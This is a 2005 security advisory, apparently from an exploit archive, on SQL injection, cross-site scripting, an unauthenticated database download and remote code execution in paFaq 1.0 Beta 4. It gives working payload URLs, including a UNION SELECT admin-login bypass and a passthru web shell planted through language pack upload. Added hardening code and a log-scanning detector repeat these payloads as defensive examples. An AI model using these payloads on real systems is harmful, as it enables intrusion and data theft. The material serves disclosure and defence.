paFaq10beta4.txt

Posted Jun 21, 2005
Authored by James Bercegay | Site gulftech.org

paFaq version 1.0 Beta 4 suffers from SQL injection and remote command execution vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | 857e5523c32704ae5bef2804a3ddd90ad4b5070e6bc0a0ccbcfafb8a75be050f

##########################################################
# GulfTech Security Research June 20th, 2005
##########################################################
# Vendor : php Arena
# URL : http://www.phparena.net/pafaq.php
# Version : paFAQ 1.0 Beta 4
# Risk : Multiple Vulnerabilities
##########################################################



Description:
paFAQ is a FAQ/knowledge base system that allows webmasters to
keep an organized database of Frequently Asked Questions, i.e. a
knowledge database of problems and solutions. There are a number
of vulnerabilities in paFaq. These include arbitrary unauthorized
access to the entire paFaq database, as well as admin
authentication bypass, SQL injection, arbitrary code execution
and cross-site scripting. An attacker can gain a remote shell on
a vulnerable system using these vulnerabilities.



Cross Site Scripting:
There are several cross-site scripting issues in the paFaq software.
The majority of them stem from user-supplied variables never being
sanitized properly.

http:///pafaq/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

These vulnerabilities can be used to render hostile code in the
context of the victim's browser, and in turn disclose sensitive
information to an attacker.



SQL Injection:
There are a number of SQL injection vulnerabilities in paFaq, but
it should be noted that to exploit these issues magic_quotes_gpc
must be off. Also, magic quotes off seems to be the default php.ini
setting now, so I do consider these issues fairly high risk. The
most serious of the SQL injection issues lies in the administrative
login.

$username = $_REQUEST['username'];        // raw, unescaped user input
$password = md5($_REQUEST['password']);

// $username is concatenated straight into the SQL text
$q = $DB->query("SELECT * FROM " . $DB->obj['tbl_pre'] . "admins WHERE name = '" . $username . "'");
$r = $DB->fetch_row($q);

if ($r['password'] == $password) {

    $t = time();
    $DB->query("UPDATE " . $DB->obj['tbl_pre'] . "admins SET session='$t' WHERE id='" . $r['id'] . "'");
    // the login cookie carries the MD5 password hash itself
    setcookie("pafaq_user", $username, time()+3600);
    setcookie("pafaq_pass", $password, time()+3600);
    // (remainder of the login handler not shown in the advisory)

The variable $username is taken directly from the submitted login form
and concatenated into the query, so if magic_quotes_gpc is off an attacker
can use UNION SELECT to bypass admin authentication!

http://pafaq/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name,'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20pafaq_admins%20WHERE%201/*&password=foobar

The query above uses a UNION SELECT to return the admin id, username, email
etc., but with the password column replaced by the MD5 hash of the password
supplied in the same request, so the comparison against $password succeeds.
If the host is vulnerable the above link will log an attacker in as the
first admin in the selected table. Additionally, the "id" parameter in most
of the scripts is vulnerable to SQL injection and can be exploited when
magic_quotes_gpc is set to off.
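A hardened version of the login handler, as an added example written for this page and not paFaq's own code. It assumes a PDO connection `$pdo`, the configured table prefix `$prefix`, the table and column names the advisory shows (admins: id, name, password, session), PHP 7.3 or later, and that stored passwords have been migrated from raw MD5 to password_hash() output. The user name is bound as a parameter, so the UNION SELECT above becomes inert data, and the cookie carries a random session token rather than the password hash, which also means a copy of the admins table is no longer a reusable credential. The `fetch_question` helper and its `questions` table are hypothetical; they show the same treatment for the "id" parameters.

```php
<?php
// Added example, not paFaq's code. Assumes: a PDO handle $pdo, the
// configured table prefix $prefix, PHP >= 7.3, and admin passwords
// stored as password_hash() output rather than raw MD5.

function admin_login(PDO $pdo, string $prefix, string $username, string $password): ?int
{
    // Identifiers cannot be bound as parameters, so the prefix (which the
    // application configures, not the user) is validated instead.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }

    // The user name travels as a bound parameter, never as SQL text, so a
    // quote or a UNION inside it is just a string that matches no admin.
    $stmt = $pdo->prepare("SELECT id, password FROM {$prefix}admins WHERE name = :name");
    $stmt->execute([':name' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($row === false || !password_verify($password, $row['password'])) {
        return null;   // unknown user or wrong password; no detail leaked
    }

    // Store an unpredictable session token, not the password hash: a copy
    // of the admins table then no longer doubles as a login credential.
    $token = bin2hex(random_bytes(32));
    $upd = $pdo->prepare("UPDATE {$prefix}admins SET session = :token WHERE id = :id");
    $upd->bindValue(':token', $token, PDO::PARAM_STR);
    $upd->bindValue(':id', (int) $row['id'], PDO::PARAM_INT);
    $upd->execute();

    setcookie('pafaq_session', $token, [
        'expires'  => time() + 3600,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    return (int) $row['id'];
}

// Hypothetical helper showing the same treatment for the "id" parameters
// the advisory mentions: cast to int and bind with an explicit type.
// The "questions" table name is assumed.
function fetch_question(PDO $pdo, string $prefix, $id): ?array
{
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    $stmt = $pdo->prepare("SELECT * FROM {$prefix}questions WHERE id = :id");
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```

Subsequent admin requests are then checked against the server-side `session` column, so the cookie value on its own says nothing about the password. Existing MD5 hashes have to be replaced (forced reset, or re-hash on the next successful login) before password_verify() can be used; until then the old `==` comparison against md5() is the only thing the stored values support.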



Arbitrary Database Download:
A very dangerous vulnerability in paFaq allows an attacker to download the
entire paFaq database. A user does not have to be logged in to exploit this
vulnerability either, which makes it that much more dangerous.

http://path/to/pafaq/admin/backup.php

An attacker can then use the MD5 password hash directly to gain
administrative access; there is no need to crack it, because the login
cookie carries the hash itself.

Cookie: pafaq_user=USERNAMEHERE; pafaq_pass=PASSWORDHASH

By sending the above cookie with the required values taken from the
downloaded database, an attacker now has admin access to the affected
paFaq installation.



Arbitrary Code Execution:
Once an attacker has administrative access to the website they can execute
arbitrary PHP code by taking advantage of the "upload a language pack"
feature. The script does check for a "valid" language pack, but if an
attacker, for example, takes the default en.php file from the language
directory, adds a simple passthru($_GET['cmd']) at the bottom of the file,
renames it to something like pafaq.php and uploads it as a new language
pack, they will be able to execute shell commands on the affected web
server by calling the malicious script in the /lang/ directory. Example:
/lang/pafaq.php?cmd=id;pwd
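An added example of the defensive check that would have stopped the upload step; this is not paFaq's code, and it assumes a hypothetical language pack format consisting solely of `$lang['key'] = 'value';` statements (the advisory does not show the contents of en.php). The pack is tokenised with PHP's own token_get_all(), any statement that is not a plain string assignment is rejected, and what is accepted is stored as JSON under a directory outside the web root rather than as a .php file the web server would execute. The `$dataDir` location and the two-to-eight-letter language code rule are assumptions.

```php
<?php
// Added example, not paFaq's code. Assumed pack format: a PHP file whose
// only statements are  $lang['key'] = 'value';

function parse_language_pack(string $source): array
{
    // Drop tokens that carry no meaning for the format check.
    $skip = [T_OPEN_TAG, T_CLOSE_TAG, T_WHITESPACE, T_COMMENT, T_DOC_COMMENT];
    $sig = [];
    foreach (token_get_all($source) as $tok) {
        if (is_array($tok) && in_array($tok[0], $skip, true)) {
            continue;
        }
        $sig[] = $tok;   // either [id, text, line] or a one-character string
    }

    $pack = [];
    // Each statement must be exactly:  $lang [ 'key' ] = 'value' ;
    // A function call such as passthru(...), or any variable other than
    // $lang (so also $_GET / $_REQUEST), fails this shape and is rejected.
    for ($i = 0; $i < count($sig); $i += 7) {
        $s = array_slice($sig, $i, 7);
        $ok = count($s) === 7
            && is_array($s[0]) && $s[0][0] === T_VARIABLE && $s[0][1] === '$lang'
            && $s[1] === '['
            && is_array($s[2]) && $s[2][0] === T_CONSTANT_ENCAPSED_STRING
            && $s[3] === ']'
            && $s[4] === '='
            && is_array($s[5]) && $s[5][0] === T_CONSTANT_ENCAPSED_STRING
            && $s[6] === ';';
        if (!$ok) {
            throw new RuntimeException('statement ' . (intdiv($i, 7) + 1)
                . ' is not a plain string assignment to $lang');
        }
        // Literal text between the quotes; escape sequences are kept verbatim.
        $pack[substr($s[2][1], 1, -1)] = substr($s[5][1], 1, -1);
    }
    return $pack;
}

function store_language_pack(string $uploadedTmpPath, string $requestedName, string $dataDir): string
{
    // Never trust the client-supplied file name: accept only a short
    // lowercase language code and choose the extension ourselves.
    if (!preg_match('/^[a-z]{2,8}$/', $requestedName)) {
        throw new RuntimeException('language code must be 2-8 lowercase letters');
    }
    $pack = parse_language_pack(file_get_contents($uploadedTmpPath));

    // Stored as JSON, outside the web root, so even a gap in the validator
    // cannot turn an upload into a script the web server will run.
    $dest = rtrim($dataDir, '/') . "/{$requestedName}.json";
    file_put_contents($dest, json_encode($pack, JSON_THROW_ON_ERROR));
    return $dest;
}

// Constructed inputs for a quick run from the command line.
$good = "<?php\n\$lang['title'] = 'Frequently Asked Questions';\n\$lang['back'] = 'Back';\n";
$bad  = $good . "passthru(\$_GET['cmd']);\n";   // the advisory's payload appended

print_r(parse_language_pack($good));
try {
    parse_language_pack($bad);
} catch (RuntimeException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
```

The application side would then read the pack with json_decode() instead of include(), which is the part that actually removes the code-execution path: a validator can be bypassed by a case it did not anticipate, but a JSON file in a non-web directory is never handed to the PHP interpreter.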



Solution:
The developers were contacted and never responded. A quick workaround would
be to delete the backup.php script and turn magic_quotes_gpc on, or better
yet use a more secure application if deployed live on the web.
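Detection logic, as an added example that is not from the advisory or the vendor, which scans web server access log lines for the request shapes this advisory describes: the UNION SELECT login bypass, direct fetches of admin/backup.php, parameterised calls to scripts in /lang/, and the script-tag probe from the cross-site scripting section. The log lines are constructed for the example, the IP addresses come from documentation ranges, and the /pafaq/ web root prefix is assumed.

```php
<?php
// Added example, not paFaq's code. Scans Apache-style access log lines for
// the request patterns described in the paFaq 1.0 Beta 4 advisory.

function sample_log(): string
{
    // Constructed log lines; the request targets follow the advisory's URLs.
    return <<<'LOG'
203.0.113.5 - - [21/Jun/2005:10:01:02 +0000] "GET /pafaq/index.php?act=Question&id=1 HTTP/1.1" 200 5123
203.0.113.5 - - [21/Jun/2005:10:01:09 +0000] "GET /pafaq/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name,'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20pafaq_admins%20WHERE%201/*&password=foobar HTTP/1.1" 302 0
198.51.100.7 - - [21/Jun/2005:10:05:44 +0000] "GET /pafaq/admin/backup.php HTTP/1.1" 200 88213
198.51.100.7 - - [21/Jun/2005:10:07:10 +0000] "GET /pafaq/lang/pafaq.php?cmd=id;pwd HTTP/1.1" 200 94
192.0.2.9 - - [21/Jun/2005:10:09:00 +0000] "GET /pafaq/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E HTTP/1.1" 200 5200
LOG;
}

function classify_request(string $line): array
{
    // Pull the request target out of a common/combined log line.
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return [];
    }
    // Decode first: the advisory's payloads arrive percent-encoded.
    $decoded = urldecode($m[1]);
    $qpos    = strpos($decoded, '?');
    $path    = $qpos === false ? $decoded : substr($decoded, 0, $qpos);
    $query   = $qpos === false ? '' : substr($decoded, $qpos + 1);

    $hits = [];
    if (preg_match('#/admin/backup\.php$#', $path)) {
        $hits[] = 'database-download';      // backup.php is reachable without login
    }
    if (preg_match('#/lang/[^/]+\.php$#', $path) && $query !== '') {
        $hits[] = 'lang-dir-script-call';   // a "language pack" invoked with parameters
    }
    if (preg_match('/\bUNION\b.*\bSELECT\b/i', $query)
        || preg_match('/(?:^|&)id=[^&]*[\'"]/', $query)) {
        $hits[] = 'sql-injection';          // UNION in any parameter, or a quote in id=
    }
    if (preg_match('/<script|javascript:/i', $query)) {
        $hits[] = 'xss-probe';
    }
    return $hits;
}

function scan_log(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $n => $line) {
        $hits = classify_request($line);
        if ($hits !== []) {
            $findings[] = [
                'line'       => $n + 1,
                'ip'         => explode(' ', $line, 2)[0],
                'indicators' => $hits,
            ];
        }
    }
    return $findings;
}

foreach (scan_log(sample_log()) as $f) {
    printf("line %d  %-14s %s\n", $f['line'], $f['ip'], implode(', ', $f['indicators']));
}
```

Running it against the constructed lines reports line 2 as sql-injection, line 3 as database-download, line 4 as lang-dir-script-call and line 5 as xss-probe; the first, legitimate request produces nothing. A 200 response to admin/backup.php from an address with no prior admin login, followed by a request into /lang/ with a query string, is the sequence that matters most, since it is the full chain from the advisory rather than a single probe.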



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00083-06202005



Credits:
James Bercegay of the GulfTech Security Research Team